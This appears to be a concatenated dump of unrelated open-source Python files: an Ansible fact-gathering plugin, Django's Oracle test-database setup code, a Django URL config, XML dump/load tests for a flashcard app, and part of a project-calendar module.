return "%s:%d(%s)" % func_name
|
mit
|
ganeshrn/ansible
|
lib/ansible/plugins/action/gather_facts.py
|
11
|
6368
|
# Copyright (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import time
from ansible import constants as C
from ansible.executor.module_common import get_action_args_with_defaults
from ansible.module_utils.parsing.convert_bool import boolean
from ansible.plugins.action import ActionBase
from ansible.utils.vars import merge_hash
class ActionModule(ActionBase):
def _get_module_args(self, fact_module, task_vars):
mod_args = self._task.args.copy()
# deal with 'setup specific arguments'
if fact_module not in C._ACTION_SETUP:
# network facts modules must support gather_subset
if self._connection._load_name not in ('network_cli', 'httpapi', 'netconf'):
subset = mod_args.pop('gather_subset', None)
if subset not in ('all', ['all']):
self._display.warning('Ignoring subset(%s) for %s' % (subset, fact_module))
timeout = mod_args.pop('gather_timeout', None)
if timeout is not None:
self._display.warning('Ignoring timeout(%s) for %s' % (timeout, fact_module))
fact_filter = mod_args.pop('filter', None)
if fact_filter is not None:
self._display.warning('Ignoring filter(%s) for %s' % (fact_filter, fact_module))
# Strip out keys with ``None`` values, effectively mimicking ``omit`` behavior
# This ensures we don't pass a ``None`` value as an argument expecting a specific type
mod_args = dict((k, v) for k, v in mod_args.items() if v is not None)
# handle module defaults
redirect_list = self._shared_loader_obj.module_loader.find_plugin_with_context(
fact_module, collection_list=self._task.collections
).redirect_list
mod_args = get_action_args_with_defaults(
fact_module, mod_args, self._task.module_defaults, self._templar, redirect_list
)
return mod_args
def _combine_task_result(self, result, task_result):
filtered_res = {
'ansible_facts': task_result.get('ansible_facts', {}),
'warnings': task_result.get('warnings', []),
'deprecations': task_result.get('deprecations', []),
}
# on conflict the last plugin processed wins, but try to do deep merge and append to lists.
return merge_hash(result, filtered_res, list_merge='append_rp')
def run(self, tmp=None, task_vars=None):
self._supports_check_mode = True
result = super(ActionModule, self).run(tmp, task_vars)
result['ansible_facts'] = {}
# copy the value with list() so we don't mutate the config
modules = list(C.config.get_config_value('FACTS_MODULES', variables=task_vars))
parallel = task_vars.pop('ansible_facts_parallel', self._task.args.pop('parallel', None))
if 'smart' in modules:
connection_map = C.config.get_config_value('CONNECTION_FACTS_MODULES', variables=task_vars)
network_os = self._task.args.get('network_os', task_vars.get('ansible_network_os', task_vars.get('ansible_facts', {}).get('network_os')))
modules.extend([connection_map.get(network_os or self._connection._load_name, 'ansible.legacy.setup')])
modules.pop(modules.index('smart'))
failed = {}
skipped = {}
if parallel is None and len(modules) >= 1:
parallel = True
else:
parallel = boolean(parallel)
if parallel:
# serially execute each module
for fact_module in modules:
# just one module, no need for fancy async
mod_args = self._get_module_args(fact_module, task_vars)
res = self._execute_module(module_name=fact_module, module_args=mod_args, task_vars=task_vars, wrap_async=False)
if res.get('failed', False):
failed[fact_module] = res
elif res.get('skipped', False):
skipped[fact_module] = res
else:
result = self._combine_task_result(result, res)
self._remove_tmp_path(self._connection._shell.tmpdir)
else:
# do it async
jobs = {}
for fact_module in modules:
mod_args = self._get_module_args(fact_module, task_vars)
self._display.vvvv("Running %s" % fact_module)
jobs[fact_module] = (self._execute_module(module_name=fact_module, module_args=mod_args, task_vars=task_vars, wrap_async=True))
while jobs:
for module in jobs:
poll_args = {'jid': jobs[module]['ansible_job_id'], '_async_dir': os.path.dirname(jobs[module]['results_file'])}
res = self._execute_module(module_name='ansible.legacy.async_status', module_args=poll_args, task_vars=task_vars, wrap_async=False)
if res.get('finished', 0) == 1:
if res.get('failed', False):
failed[module] = res
elif res.get('skipped', False):
skipped[module] = res
else:
result = self._combine_task_result(result, res)
del jobs[module]
break
else:
time.sleep(0.1)
else:
time.sleep(0.5)
if skipped:
result['msg'] = "The following modules were skipped: %s\n" % (', '.join(skipped.keys()))
result['skipped_modules'] = skipped
if len(skipped) == len(modules):
result['skipped'] = True
if failed:
result['failed'] = True
result['msg'] = "The following modules failed to execute: %s\n" % (', '.join(failed.keys()))
result['failed_modules'] = failed
# tell executor facts were gathered
result['ansible_facts']['_ansible_facts_gathered'] = True
# hack to keep --verbose from showing all the setup module result
result['_ansible_verbose_override'] = True
return result
|
gpl-3.0
|
scottferg/web-console
|
django/db/backends/oracle/creation.py
|
9
|
11427
|
import sys, time
from django.db.backends.creation import BaseDatabaseCreation
TEST_DATABASE_PREFIX = 'test_'
PASSWORD = 'Im_a_lumberjack'
class DatabaseCreation(BaseDatabaseCreation):
# This dictionary maps Field objects to their associated Oracle column
# types, as strings. Column-type strings can contain format strings; they'll
# be interpolated against the values of Field.__dict__ before being output.
# If a column type is set to None, it won't be included in the output.
#
# Any format strings starting with "qn_" are quoted before being used in the
# output (the "qn_" prefix is stripped before the lookup is performed.
data_types = {
'AutoField': 'NUMBER(11)',
'BooleanField': 'NUMBER(1) CHECK (%(qn_column)s IN (0,1))',
'CharField': 'NVARCHAR2(%(max_length)s)',
'CommaSeparatedIntegerField': 'VARCHAR2(%(max_length)s)',
'DateField': 'DATE',
'DateTimeField': 'TIMESTAMP',
'DecimalField': 'NUMBER(%(max_digits)s, %(decimal_places)s)',
'FileField': 'NVARCHAR2(%(max_length)s)',
'FilePathField': 'NVARCHAR2(%(max_length)s)',
'FloatField': 'DOUBLE PRECISION',
'IntegerField': 'NUMBER(11)',
'BigIntegerField': 'NUMBER(19)',
'IPAddressField': 'VARCHAR2(15)',
'NullBooleanField': 'NUMBER(1) CHECK ((%(qn_column)s IN (0,1)) OR (%(qn_column)s IS NULL))',
'OneToOneField': 'NUMBER(11)',
'PositiveIntegerField': 'NUMBER(11) CHECK (%(qn_column)s >= 0)',
'PositiveSmallIntegerField': 'NUMBER(11) CHECK (%(qn_column)s >= 0)',
'SlugField': 'NVARCHAR2(%(max_length)s)',
'SmallIntegerField': 'NUMBER(11)',
'TextField': 'NCLOB',
'TimeField': 'TIMESTAMP',
'URLField': 'VARCHAR2(%(max_length)s)',
}
def __init__(self, connection):
self.remember = {}
super(DatabaseCreation, self).__init__(connection)
def _create_test_db(self, verbosity=1, autoclobber=False):
TEST_NAME = self._test_database_name()
TEST_USER = self._test_database_user()
TEST_PASSWD = self._test_database_passwd()
TEST_TBLSPACE = self._test_database_tblspace()
TEST_TBLSPACE_TMP = self._test_database_tblspace_tmp()
parameters = {
'dbname': TEST_NAME,
'user': TEST_USER,
'password': TEST_PASSWD,
'tblspace': TEST_TBLSPACE,
'tblspace_temp': TEST_TBLSPACE_TMP,
}
self.remember['user'] = self.connection.settings_dict['USER']
self.remember['passwd'] = self.connection.settings_dict['PASSWORD']
cursor = self.connection.cursor()
if self._test_database_create():
try:
self._execute_test_db_creation(cursor, parameters, verbosity)
except Exception, e:
sys.stderr.write("Got an error creating the test database: %s\n" % e)
if not autoclobber:
confirm = raw_input("It appears the test database, %s, already exists. Type 'yes' to delete it, or 'no' to cancel: " % TEST_NAME)
if autoclobber or confirm == 'yes':
try:
if verbosity >= 1:
print "Destroying old test database '%s'..." % self.connection.alias
self._execute_test_db_destruction(cursor, parameters, verbosity)
self._execute_test_db_creation(cursor, parameters, verbosity)
except Exception, e:
sys.stderr.write("Got an error recreating the test database: %s\n" % e)
sys.exit(2)
else:
print "Tests cancelled."
sys.exit(1)
if self._test_user_create():
if verbosity >= 1:
print "Creating test user..."
try:
self._create_test_user(cursor, parameters, verbosity)
except Exception, e:
sys.stderr.write("Got an error creating the test user: %s\n" % e)
if not autoclobber:
confirm = raw_input("It appears the test user, %s, already exists. Type 'yes' to delete it, or 'no' to cancel: " % TEST_USER)
if autoclobber or confirm == 'yes':
try:
if verbosity >= 1:
print "Destroying old test user..."
self._destroy_test_user(cursor, parameters, verbosity)
if verbosity >= 1:
print "Creating test user..."
self._create_test_user(cursor, parameters, verbosity)
except Exception, e:
sys.stderr.write("Got an error recreating the test user: %s\n" % e)
sys.exit(2)
else:
print "Tests cancelled."
sys.exit(1)
self.connection.settings_dict['TEST_USER'] = self.connection.settings_dict["USER"] = TEST_USER
self.connection.settings_dict["PASSWORD"] = TEST_PASSWD
return self.connection.settings_dict['NAME']
def _destroy_test_db(self, test_database_name, verbosity=1):
"""
Destroy a test database, prompting the user for confirmation if the
database already exists. Returns the name of the test database created.
"""
TEST_NAME = self._test_database_name()
TEST_USER = self._test_database_user()
TEST_PASSWD = self._test_database_passwd()
TEST_TBLSPACE = self._test_database_tblspace()
TEST_TBLSPACE_TMP = self._test_database_tblspace_tmp()
self.connection.settings_dict["USER"] = self.remember['user']
self.connection.settings_dict["PASSWORD"] = self.remember['passwd']
parameters = {
'dbname': TEST_NAME,
'user': TEST_USER,
'password': TEST_PASSWD,
'tblspace': TEST_TBLSPACE,
'tblspace_temp': TEST_TBLSPACE_TMP,
}
cursor = self.connection.cursor()
time.sleep(1) # To avoid "database is being accessed by other users" errors.
if self._test_user_create():
if verbosity >= 1:
print 'Destroying test user...'
self._destroy_test_user(cursor, parameters, verbosity)
if self._test_database_create():
if verbosity >= 1:
print 'Destroying test database tables...'
self._execute_test_db_destruction(cursor, parameters, verbosity)
self.connection.close()
def _execute_test_db_creation(self, cursor, parameters, verbosity):
if verbosity >= 2:
print "_create_test_db(): dbname = %s" % parameters['dbname']
statements = [
"""CREATE TABLESPACE %(tblspace)s
DATAFILE '%(tblspace)s.dbf' SIZE 20M
REUSE AUTOEXTEND ON NEXT 10M MAXSIZE 200M
""",
"""CREATE TEMPORARY TABLESPACE %(tblspace_temp)s
TEMPFILE '%(tblspace_temp)s.dbf' SIZE 20M
REUSE AUTOEXTEND ON NEXT 10M MAXSIZE 100M
""",
]
self._execute_statements(cursor, statements, parameters, verbosity)
def _create_test_user(self, cursor, parameters, verbosity):
if verbosity >= 2:
print "_create_test_user(): username = %s" % parameters['user']
statements = [
"""CREATE USER %(user)s
IDENTIFIED BY %(password)s
DEFAULT TABLESPACE %(tblspace)s
TEMPORARY TABLESPACE %(tblspace_temp)s
""",
"""GRANT CONNECT, RESOURCE TO %(user)s""",
]
self._execute_statements(cursor, statements, parameters, verbosity)
def _execute_test_db_destruction(self, cursor, parameters, verbosity):
if verbosity >= 2:
print "_execute_test_db_destruction(): dbname=%s" % parameters['dbname']
statements = [
'DROP TABLESPACE %(tblspace)s INCLUDING CONTENTS AND DATAFILES CASCADE CONSTRAINTS',
'DROP TABLESPACE %(tblspace_temp)s INCLUDING CONTENTS AND DATAFILES CASCADE CONSTRAINTS',
]
self._execute_statements(cursor, statements, parameters, verbosity)
def _destroy_test_user(self, cursor, parameters, verbosity):
if verbosity >= 2:
print "_destroy_test_user(): user=%s" % parameters['user']
print "Be patient. This can take some time..."
statements = [
'DROP USER %(user)s CASCADE',
]
self._execute_statements(cursor, statements, parameters, verbosity)
def _execute_statements(self, cursor, statements, parameters, verbosity):
for template in statements:
stmt = template % parameters
if verbosity >= 2:
print stmt
try:
cursor.execute(stmt)
except Exception, err:
sys.stderr.write("Failed (%s)\n" % (err))
raise
def _test_database_name(self):
name = TEST_DATABASE_PREFIX + self.connection.settings_dict['NAME']
try:
if self.connection.settings_dict['TEST_NAME']:
name = self.connection.settings_dict['TEST_NAME']
except AttributeError:
pass
return name
def _test_database_create(self):
return self.connection.settings_dict.get('TEST_CREATE', True)
def _test_user_create(self):
return self.connection.settings_dict.get('TEST_USER_CREATE', True)
def _test_database_user(self):
name = TEST_DATABASE_PREFIX + self.connection.settings_dict['USER']
try:
if self.connection.settings_dict['TEST_USER']:
name = self.connection.settings_dict['TEST_USER']
except KeyError:
pass
return name
def _test_database_passwd(self):
name = PASSWORD
try:
if self.connection.settings_dict['TEST_PASSWD']:
name = self.connection.settings_dict['TEST_PASSWD']
except KeyError:
pass
return name
def _test_database_tblspace(self):
name = TEST_DATABASE_PREFIX + self.connection.settings_dict['NAME']
try:
if self.connection.settings_dict['TEST_TBLSPACE']:
name = self.connection.settings_dict['TEST_TBLSPACE']
except KeyError:
pass
return name
def _test_database_tblspace_tmp(self):
name = TEST_DATABASE_PREFIX + self.connection.settings_dict['NAME'] + '_temp'
try:
if self.connection.settings_dict['TEST_TBLSPACE_TMP']:
name = self.connection.settings_dict['TEST_TBLSPACE_TMP']
except KeyError:
pass
return name
|
bsd-3-clause
|
progdupeupl/pdp_website
|
pdp/messages/urls.py
|
1
|
1131
|
# coding: utf-8
#
# This file is part of Progdupeupl.
#
# Progdupeupl is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Progdupeupl is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Progdupeupl. If not, see <http://www.gnu.org/licenses/>.
from django.conf.urls import patterns, url
from pdp.messages import views
urlpatterns = patterns(
'',
# Viewing a thread
url(r'^nouveau$', views.new),
url(r'^editer$', views.edit),
url(r'^(?P<topic_pk>\d+)/(?P<topic_slug>.+)$', views.topic),
# Message-related
url(r'^message/editer$', views.edit_post),
url(r'^message/nouveau$', views.answer),
# Home
url(r'^$', views.index),
)
|
agpl-3.0
|
sycy600/pamietacz
|
src/pamietacz/tests/dump_load_tests.py
|
1
|
12140
|
from django.core.files.uploadedfile import SimpleUploadedFile
from pamietacz.models import Shelf, Deck, Card
from test_utils import (add_shelf,
add_deck,
add_card,
TransactionTestCaseWithAuthentication)
class DumpLoadTests(TransactionTestCaseWithAuthentication):
def test_dump_and_load(self):
# Add shelves.
add_shelf(self.client, "1st shelf")
add_shelf(self.client, "2nd shelf><\"&")
add_shelf(self.client, "3rd shelf")
# Add decks.
all_shelves = Shelf.objects.all()
first_shelf = all_shelves[0]
add_deck(self.client, first_shelf.id, "1st shelf 1st deck><\"&")
add_deck(self.client, first_shelf.id, "1st shelf 2nd deck")
# Add some cards.
all_decks = Deck.objects.all()
first_shelf_first_deck = all_decks[0]
add_card(self.client, first_shelf_first_deck.id,
"1st deck 1st question><",
"1st deck 1st answer><\"&")
first_shelf_second_deck = all_decks[1]
add_card(self.client, first_shelf_second_deck.id,
"2nd deck 1st question",
"2nd deck 1st answer")
add_card(self.client, first_shelf_second_deck.id,
"2nd deck 2nd question",
"2nd deck 2nd answer")
all_cards = Card.objects.all()
# Check the number of added shelves, decks and cards.
self.assertEqual(len(all_cards), 3)
self.assertEqual(len(all_shelves), 3)
self.assertEqual(len(all_decks), 2)
# Remember shelves for next checks.
first_shelf = all_shelves[0]
second_shelf = all_shelves[1]
third_shelf = all_shelves[2]
# Remember decks for next checks.
first_shelf_first_deck = all_decks[0]
first_shelf_second_deck = all_decks[1]
# Remember questions for next checks.
first_deck_first_question = all_cards[0].question
first_deck_first_answer = all_cards[0].answer
second_deck_first_question = all_cards[1].question
second_deck_first_answer = all_cards[1].answer
second_deck_second_question = all_cards[2].question
second_deck_second_answer = all_cards[2].answer
# Check if correct XML file was generated.
r = self.client.get("/data/dump/")
c = ("""<?xml version='1.0' encoding='UTF-8'?>\n"""
"""<data>\n"""
""" <shelf name="1st shelf">\n"""
""" <deck name="1st shelf 1st deck><"&">\n"""
""" <card>\n"""
""" <question>1st deck 1st question><</question>\n"""
""" <answer>1st deck 1st answer><"&</answer>\n"""
""" </card>\n"""
""" </deck>\n"""
""" <deck name="1st shelf 2nd deck">\n"""
""" <card>\n"""
""" <question>2nd deck 1st question</question>\n"""
""" <answer>2nd deck 1st answer</answer>\n"""
""" </card>\n"""
""" <card>\n"""
""" <question>2nd deck 2nd question</question>\n"""
""" <answer>2nd deck 2nd answer</answer>\n"""
""" </card>\n"""
""" </deck>\n"""
""" </shelf>\n"""
""" <shelf name="2nd shelf><"&"/>\n"""
""" <shelf name="3rd shelf"/>\n"""
"""</data>\n""")
self.assertEqual(c, r.content)
self.assertEqual(200, r.status_code)
# Delete all shelves (with all decks and cards) from database.
shelves = Shelf.objects.all()
for shelf in shelves:
self.client.get("/shelf/%d/delete/" % shelf.id)
# Check if all cards were deleted.
self.assertEqual(len(Card.objects.all()), 0)
self.assertEqual(len(Shelf.objects.all()), 0)
self.assertEqual(len(Deck.objects.all()), 0)
# Load data from XML file back to database.
sent_file = SimpleUploadedFile("dump_data.xml", r.content)
r = self.client.post("/data/load/", {"data_dump_file": sent_file},
follow=True)
self.assertEqual(200, r.status_code)
all_shelves = Shelf.objects.all()
all_decks = Deck.objects.all()
all_cards = Card.objects.all()
# Check number of loaded cards from file.
self.assertEqual(len(all_cards), 3)
self.assertEqual(len(all_shelves), 3)
self.assertEqual(len(all_decks), 2)
# Check if loaded shelves are the same as previously
# located in database.
self.assertEqual(first_shelf, all_shelves[0])
self.assertEqual(second_shelf, all_shelves[1])
self.assertEqual(third_shelf, all_shelves[2])
# Check if loaded decks are the same as previously
# located in database.
self.assertEqual(first_shelf_first_deck, all_decks[0])
self.assertEqual(first_shelf_second_deck, all_decks[1])
# Check if loaded cards are the same as previously
# located in database.
self.assertEqual(first_deck_first_question,
all_cards[0].question)
self.assertEqual(first_deck_first_answer,
all_cards[0].answer)
self.assertEqual(second_deck_first_question,
all_cards[1].question)
self.assertEqual(second_deck_first_answer,
all_cards[1].answer)
self.assertEqual(second_deck_second_question,
all_cards[2].question)
self.assertEqual(second_deck_second_answer,
all_cards[2].answer)
# Check the structure.
# first shelf first deck
self.assertEqual(all_decks[0].shelf, all_shelves[0])
# first shelf second deck
self.assertEqual(all_decks[1].shelf, all_shelves[0])
# first shelf first deck first card
self.assertEqual(all_cards[0].deck, all_decks[0])
# first shelf second deck first card
self.assertEqual(all_cards[1].deck, all_decks[1])
# first shelf second deck second card
self.assertEqual(all_cards[2].deck, all_decks[1])
def test_load_not_xml_file(self):
"""No XML files are allowed."""
sent_file = SimpleUploadedFile("dump_data.xml", "dsfsdfsdfsd")
r = self.client.post("/data/load/", {"data_dump_file": sent_file},
follow=True)
self.assertEqual(200, r.status_code)
self.assertIn("Error while parsing XML: Start tag expected",
r.content)
self.assertEqual(len(Card.objects.all()), 0)
self.assertEqual(len(Shelf.objects.all()), 0)
self.assertEqual(len(Deck.objects.all()), 0)
def test_load_wrong_encoding_unknown(self):
"""Unknown encoding provided."""
xml_content = "<?xml version='1.0' encoding='aaa-8'?><shelf></shelf>"
sent_file = SimpleUploadedFile("dump_data.xml", xml_content)
r = self.client.post("/data/load/", {"data_dump_file": sent_file},
follow=True)
self.assertEqual(200, r.status_code)
self.assertIn("Error while parsing XML: Unsupported encoding aaa-8",
r.content)
self.assertEqual(len(Card.objects.all()), 0)
self.assertEqual(len(Shelf.objects.all()), 0)
self.assertEqual(len(Deck.objects.all()), 0)
def test_load_wrong_encoding_not_supported(self):
"""Not supported encoding provided."""
xml_content = "<?xml version='1.0' encoding='ASCII'?><shelf></shelf>"
sent_file = SimpleUploadedFile("dump_data.xml", xml_content)
r = self.client.post("/data/load/", {"data_dump_file": sent_file},
follow=True)
self.assertEqual(200, r.status_code)
self.assertIn("Error while parsing XML: "
"Not supported encoding: ASCII",
r.content)
self.assertEqual(len(Card.objects.all()), 0)
self.assertEqual(len(Shelf.objects.all()), 0)
self.assertEqual(len(Deck.objects.all()), 0)
def test_load_wrong_root_element_name(self):
"""Root elements is called 'data' and other are refused."""
sent_file = SimpleUploadedFile("dump_data.xml", "<shelllf></shelllf>")
r = self.client.post("/data/load/", {"data_dump_file": sent_file},
follow=True)
self.assertEqual(200, r.status_code)
self.assertIn("Error while parsing XML: 1: shelllf != 'data'",
r.content)
self.assertEqual(len(Card.objects.all()), 0)
self.assertEqual(len(Shelf.objects.all()), 0)
self.assertEqual(len(Deck.objects.all()), 0)
def test_no_name_for_shelf(self):
"""Shelf must have 'name' attribute."""
sent_file = SimpleUploadedFile("dump_data.xml",
"<data><shelf></shelf></data>")
r = self.client.post("/data/load/", {"data_dump_file": sent_file},
follow=True)
self.assertEqual(200, r.status_code)
self.assertIn("Error while parsing XML: 1: cannot add shelf: "
"pamietacz_shelf.name may not be NULL", r.content)
self.assertEqual(len(Card.objects.all()), 0)
self.assertEqual(len(Shelf.objects.all()), 0)
self.assertEqual(len(Deck.objects.all()), 0)
def test_shelf_already_exists(self):
"""Shelf with the same name as one which already
is present in database won't be added."""
add_shelf(self.client, "aa")
xml_content = "<data><shelf name=\"aa\"></shelf></data>"
sent_file = SimpleUploadedFile("dump_data.xml", xml_content)
r = self.client.post("/data/load/", {"data_dump_file": sent_file},
follow=True)
self.assertEqual(200, r.status_code)
self.assertIn("Error while parsing XML: 1: cannot add shelf: "
"column name is not unique", r.content)
self.assertEqual(len(Card.objects.all()), 0)
self.assertEqual(len(Shelf.objects.all()), 1)
self.assertEqual(len(Deck.objects.all()), 0)
def test_partially_wrong_xml_file(self):
"""If XML file is partially wrong then nothing
won't be added at all."""
xml_content = ("<data><shelf name=\"aa\"></shelf>"
"<shelf name=\"bb\"><deck name=\"xx\"><ee></ee></deck>"
"</shelf></data>")
sent_file = SimpleUploadedFile("dump_data.xml", xml_content)
r = self.client.post("/data/load/", {"data_dump_file": sent_file},
follow=True)
self.assertEqual(200, r.status_code)
self.assertIn("Error while parsing XML: 1: ee != 'card'",
r.content)
self.assertEqual(len(Card.objects.all()), 0)
self.assertEqual(len(Shelf.objects.all()), 0)
self.assertEqual(len(Deck.objects.all()), 0)
def test_order_of_decks_is_taken_into_account(self):
"""Order of decks is kept in XML dump so that decks are sorted
by order."""
add_shelf(self.client, "first shelf")
# Add decks.
all_shelves = Shelf.objects.all()
add_deck(self.client, all_shelves[0].id, "first deck")
add_deck(self.client, all_shelves[0].id, "second deck")
all_decks = Deck.objects.all()
# Move first shelf up.
self.client.get("/deck/%d/move/up/" % all_decks[0].id)
# Second shelf is listed as first and first shelf is listed as second.
r = self.client.get("/data/dump/")
c = ("""<?xml version='1.0' encoding='UTF-8'?>\n"""
"""<data>\n"""
""" <shelf name="first shelf">\n"""
""" <deck name="second deck"/>\n"""
""" <deck name="first deck"/>\n"""
""" </shelf>\n"""
"""</data>\n""")
self.assertEqual(c, r.content)
|
bsd-2-clause
|
factorlibre/OCB
|
addons/resource/faces/pcalendar.py
|
433
|
28436
|
#@+leo-ver=4
#@+node:@file pcalendar.py
#@@language python
#@<< Copyright >>
#@+node:<< Copyright >>
############################################################################
# Copyright (C) 2005, 2006, 2007, 2008 by Reithinger GmbH
# [email protected]
#
# This file is part of faces.
#
# faces is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# faces is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the
# Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
############################################################################
#@-node:<< Copyright >>
#@nl
"""
This module contains all classes and functions for the project plan calendar
"""
#@<< Imports >>
#@+node:<< Imports >>
from string import *
import datetime
import time
import re
import locale
import bisect
import sys
TIME_RANGE_PATTERN = re.compile("(\\d+):(\\d+)\\s*-\\s*(\\d+):(\\d+)")
TIME_DELTA_PATTERN = re.compile("([-+]?\\d+(\\.\\d+)?)([dwmyMH])")
DEFAULT_MINIMUM_TIME_UNIT = 15
DEFAULT_WORKING_DAYS_PER_WEEK = 5
DEFAULT_WORKING_DAYS_PER_MONTH = 20
DEFAULT_WORKING_DAYS_PER_YEAR = 200
DEFAULT_WORKING_HOURS_PER_DAY = 8
DEFAULT_WORKING_TIMES = ( (8 * 60, 12 * 60 ),
(13 * 60, 17 * 60 ) )
DEFAULT_WORKING_DAYS = { 0 : DEFAULT_WORKING_TIMES,
1 : DEFAULT_WORKING_TIMES,
2 : DEFAULT_WORKING_TIMES,
3 : DEFAULT_WORKING_TIMES,
4 : DEFAULT_WORKING_TIMES,
5 : (),
6 : () }
#@-node:<< Imports >>
#@nl
#@+others
#@+node:to_time_range
def to_time_range(src):
"""
converts a string to a timerange, i.e
(from, to)
from, to are ints, specifing the minutes since midnight
"""
if not src: return ()
mo = TIME_RANGE_PATTERN.match(src)
if not mo:
raise ValueError("%s is no time range" % src)
from_time = int(mo.group(1)) * 60 + int(mo.group(2))
to_time = int(mo.group(3)) * 60 + int(mo.group(4))
return from_time, to_time
#@-node:to_time_range
#@+node:to_datetime
def to_datetime(src):
"""
a tolerant conversion function to convert different strings
to a datetime.dateime
"""
#to get the original value for wrappers
new = getattr(src, "_value", src)
while new is not src:
src = new
new = getattr(src, "_value", src)
if isinstance(src, _WorkingDateBase):
src = src.to_datetime()
if isinstance(src, datetime.datetime):
return src
src = str(src)
formats = [ "%x %H:%M",
"%x",
"%Y-%m-%d %H:%M",
"%y-%m-%d %H:%M",
"%d.%m.%Y %H:%M",
"%d.%m.%y %H:%M",
"%Y%m%d %H:%M",
"%d/%m/%y %H:%M",
"%d/%m/%Y %H:%M",
"%d/%m/%Y",
"%d/%m/%y",
"%Y-%m-%d",
"%y-%m-%d",
"%d.%m.%Y",
"%d.%m.%y",
"%Y%m%d" ]
for f in formats:
try:
conv = time.strptime(src, f)
return datetime.datetime(*conv[0:-3])
except Exception, e:
pass
raise TypeError("'%s' (%s) is not a datetime" % (src, str(type(src))))
#@-node:
#@+node:_to_days
def _to_days(src):
"""
converts a string of the day abreviations mon, tue, wed,
thu, fri, sat, sun to a dir with correct weekday indices.
For Example
convert_to_days('mon, tue, thu') results in
{ 0:1, 1:1, 3:1 }
"""
tokens = src.split(",")
result = { }
for t in tokens:
try:
index = { "mon" : 0,
"tue" : 1,
"wed" : 2,
"thu" : 3,
"fri" : 4,
"sat" : 5,
"sun" : 6 } [ lower(t.strip()) ]
result[index] = 1
except:
raise ValueError("%s is not a day" % (t))
return result
#@-node:_to_days
#@+node:_add_to_time_spans
def _add_to_time_spans(src, to_add, is_free):
if not isinstance(to_add, (tuple, list)):
to_add = (to_add,)
tmp = []
for start, end, f in src:
tmp.append((start, True, f))
tmp.append((end, False, f))
for v in to_add:
if isinstance(v, (tuple, list)):
start = to_datetime(v[0])
end = to_datetime(v[1])
else:
start = to_datetime(v)
end = start.replace(hour=0, minute=0) + datetime.timedelta(1)
tmp.append((start, start <= end, is_free))
tmp.append((end, start > end, is_free))
tmp.sort()
# 0: date
# 1: is_start
# 2: is_free
sequence = []
free_count = 0
work_count = 0
last = None
for date, is_start, is_free in tmp:
if is_start:
if is_free:
if not free_count and not work_count:
last = date
free_count += 1
else:
if not work_count:
if free_count: sequence.append((last, date, True))
last = date
work_count += 1
else:
if is_free:
assert(free_count > 0)
free_count -= 1
if not free_count and not work_count:
sequence.append((last, date, True))
else:
assert(work_count > 0)
work_count -= 1
if not work_count: sequence.append((last, date, False))
if free_count: last = date
return tuple(sequence)
#@-node:_add_to_time_spans
#@+node:to_timedelta
def to_timedelta(src, cal=None, is_duration=False):
"""
converts a string to a datetime.timedelta. If cal is specified
it will be used for getting the working times. if is_duration=True
working times will not be considered. Valid units are
d for Days
w for Weeks
m for Months
y for Years
H for Hours
M for Minutes
"""
cal = cal or _default_calendar
if isinstance(src, datetime.timedelta):
return datetime.timedelta(src.days, seconds=src.seconds, calendar=cal)
if isinstance(src, (long, int, float)):
src = "%sM" % str(src)
if not isinstance(src, basestring):
raise ValueError("%s is not a duration" % (repr(src)))
src = src.strip()
if is_duration:
d_p_w = 7
d_p_m = 30
d_p_y = 360
d_w_h = 24
else:
d_p_w = cal.working_days_per_week
d_p_m = cal.working_days_per_month
d_p_y = cal.working_days_per_year
d_w_h = cal.working_hours_per_day
def convert_minutes(minutes):
minutes = int(minutes)
hours = minutes / 60
minutes = minutes % 60
days = hours / d_w_h
hours = hours % d_w_h
return [ days, 0, 0, 0, minutes, hours ]
def convert_days(value):
days = int(value)
value -= days
value *= d_w_h
hours = int(value)
value -= hours
value *= 60
minutes = round(value)
return [ days, 0, 0, 0, minutes, hours ]
sum_args = [ 0, 0, 0, 0, 0, 0 ]
split = src.split(" ")
for s in split:
mo = TIME_DELTA_PATTERN.match(s)
if not mo:
raise ValueError(src +
" is not a valid duration: valid"
" units are: d w m y M H")
unit = mo.group(3)
val = float(mo.group(1))
if unit == 'd':
args = convert_days(val)
elif unit == 'w':
args = convert_days(val * d_p_w)
elif unit == 'm':
args = convert_days(val * d_p_m)
elif unit == 'y':
args = convert_days(val * d_p_y)
elif unit == 'M':
args = convert_minutes(val)
elif unit == 'H':
args = convert_minutes(val * 60)
sum_args = [ a + b for a, b in zip(sum_args, args) ]
sum_args = tuple(sum_args)
return datetime.timedelta(*sum_args)
#@-node:to_timedelta
#@+node:timedelta_to_str
def timedelta_to_str(delta, format, cal=None, is_duration=False):
cal = cal or _default_calendar
if is_duration:
d_p_w = 7
d_p_m = 30
d_p_y = 365
d_w_h = 24
else:
d_p_w = cal.working_days_per_week
d_p_m = cal.working_days_per_month
d_p_y = cal.working_days_per_year
d_w_h = cal.working_hours_per_day
has_years = format.find("%y") > -1
has_minutes = format.find("%M") > -1
has_hours = format.find("%H") > -1 or has_minutes
has_days = format.find("%d") > -1
has_weeks = format.find("%w") > -1
has_months = format.find("%m") > -1
result = format
days = delta.days
d_r = (days, format)
minutes = delta.seconds / 60
def rebase(d_r, cond1, cond2, letter, divisor):
#rebase the days
if not cond1: return d_r
days, result = d_r
if cond2:
val = days / divisor
if not val:
result = re.sub("{[^{]*?%" + letter + "[^}]*?}", "", result)
result = result.replace("%" + letter, str(val))
days %= divisor
else:
result = result.replace("%" + letter,
locale.format("%.2f",
(float(days) / divisor)))
return (days, result)
d_r = rebase(d_r, has_years, has_months or has_weeks or has_days, "y", d_p_y)
